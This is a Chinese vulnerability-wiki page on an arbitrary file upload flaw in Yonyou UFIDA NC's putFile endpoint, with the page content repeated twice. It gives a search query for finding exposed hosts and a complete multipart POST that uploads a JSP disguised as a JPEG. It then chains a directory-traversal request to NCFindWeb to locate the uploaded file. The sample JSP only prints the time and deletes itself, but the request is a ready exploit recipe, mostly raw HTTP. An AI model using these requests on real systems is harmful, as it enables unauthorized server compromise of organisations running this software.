fofamini-wiki

登录白背景

源码

用友UFIDA NC putFile存在任意文件上传漏洞

一、漏洞简介

用友UFIDA NC putFile存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。

二、影响版本

用友UFIDA NC

三、资产测绘

hunterapp.name="用友 UFIDA NC"
特征

四、漏洞复现

POST /portal/file?cmd=putFile&pk_org=1 HTTP/1.1
Host: xx.xx.xx.xx
Content-Length: 1010
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUscir5wae6fGsk4f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=4CE4F022D21FE883F86C892F25CFFA69; JSESSIONID=323578C1A50D1E687A0AB7434C16485F
Connection: close

------WebKitFormBoundaryUscir5wae6fGsk4f
Content-Disposition: form-data; name="pic"; filename="1.jsp"
Content-Type: image/jpeg

<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>
<%
    // 获取当前时间
    java.util.Date currentTime = new java.util.Date();
    String currentTimeString = currentTime.toString();

    // 输出当前时间
    out.println(currentTimeString);

    // 删除当前文件
    java.io.File file = new java.io.File(request.getRealPath(request.getServletPath()));
    file.delete();
%>


------WebKitFormBoundaryUscir5wae6fGsk4f
Content-Disposition: form-data; name="style"

file
------WebKitFormBoundaryUscir5wae6fGsk4f
Content-Disposition: form-data; name="source"


------WebKitFormBoundaryUscir5wae6fGsk4f
Content-Disposition: form-data; name="identifier"

compdoc_123
------WebKitFormBoundaryUscir5wae6fGsk4f
Content-Disposition: form-data; name="pkfile"


------WebKitFormBoundaryUscir5wae6fGsk4f--

需结合用友UFIDA NC NCFindWeb 目录遍历漏洞查看上传文件名

GET /NCFindWeb?filename=../../hotwebs/portal/files/compdoc HTTP/1.1
Host: xx.xx.xx.xx
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=4CE4F022D21FE883F86C892F25CFFA69; JSESSIONID=323578C1A50D1E687A0AB7434C16485F
Connection: close

上传文件位置

/portal/files/compdoc/1_sep_1699582686338.jsp

原文: https://www.yuque.com/xiaokp7/ocvun2/sgpbs4uqqzf0s0bf

# 用友UFIDA NC putFile存在任意文件上传漏洞

# 一、漏洞简介
用友UFIDA NC putFile存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。

# 二、影响版本

- 用友UFIDA NC

# 三、资产测绘

- hunter`app.name="用友 UFIDA NC"`
- 特征

![image.png](./img/as4EtB0RjoG5DI0M/1695490122461-e51a4960-cbf1-4f8b-b3af-1de065806b72-405146.png)

# 四、漏洞复现
```
POST /portal/file?cmd=putFile&pk_org=1 HTTP/1.1
Host: xx.xx.xx.xx
Content-Length: 1010
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUscir5wae6fGsk4f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=4CE4F022D21FE883F86C892F25CFFA69; JSESSIONID=323578C1A50D1E687A0AB7434C16485F
Connection: close

------WebKitFormBoundaryUscir5wae6fGsk4f
Content-Disposition: form-data; name="pic"; filename="1.jsp"
Content-Type: image/jpeg

<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>
<%
    // 获取当前时间
    java.util.Date currentTime = new java.util.Date();
    String currentTimeString = currentTime.toString();

// 输出当前时间
    out.println(currentTimeString);

// 删除当前文件
    java.io.File file = new java.io.File(request.getRealPath(request.getServletPath()));
    file.delete();
%>

------WebKitFormBoundaryUscir5wae6fGsk4f
Content-Disposition: form-data; name="style"

file
------WebKitFormBoundaryUscir5wae6fGsk4f
Content-Disposition: form-data; name="source"

------WebKitFormBoundaryUscir5wae6fGsk4f
Content-Disposition: form-data; name="identifier"

compdoc_123
------WebKitFormBoundaryUscir5wae6fGsk4f
Content-Disposition: form-data; name="pkfile"

------WebKitFormBoundaryUscir5wae6fGsk4f--
```
![image.png](./img/as4EtB0RjoG5DI0M/1699582701496-439240b6-0a6d-4bd2-8489-d91db833fc04-560137.png)
需结合用友UFIDA NC NCFindWeb 目录遍历漏洞查看上传文件名
```
GET /NCFindWeb?filename=../../hotwebs/portal/files/compdoc HTTP/1.1
Host: xx.xx.xx.xx
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=4CE4F022D21FE883F86C892F25CFFA69; JSESSIONID=323578C1A50D1E687A0AB7434C16485F
Connection: close
```
![image.png](./img/as4EtB0RjoG5DI0M/1699582904362-6d4621df-03b5-4f5a-9fab-b6859637114e-518054.png)
上传文件位置
```
/portal/files/compdoc/1_sep_1699582686338.jsp
```
![image.png](./img/as4EtB0RjoG5DI0M/1699582984939-77200fdc-ed9d-4711-8ab9-c232bda1b85d-046984.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/sgpbs4uqqzf0s0bf>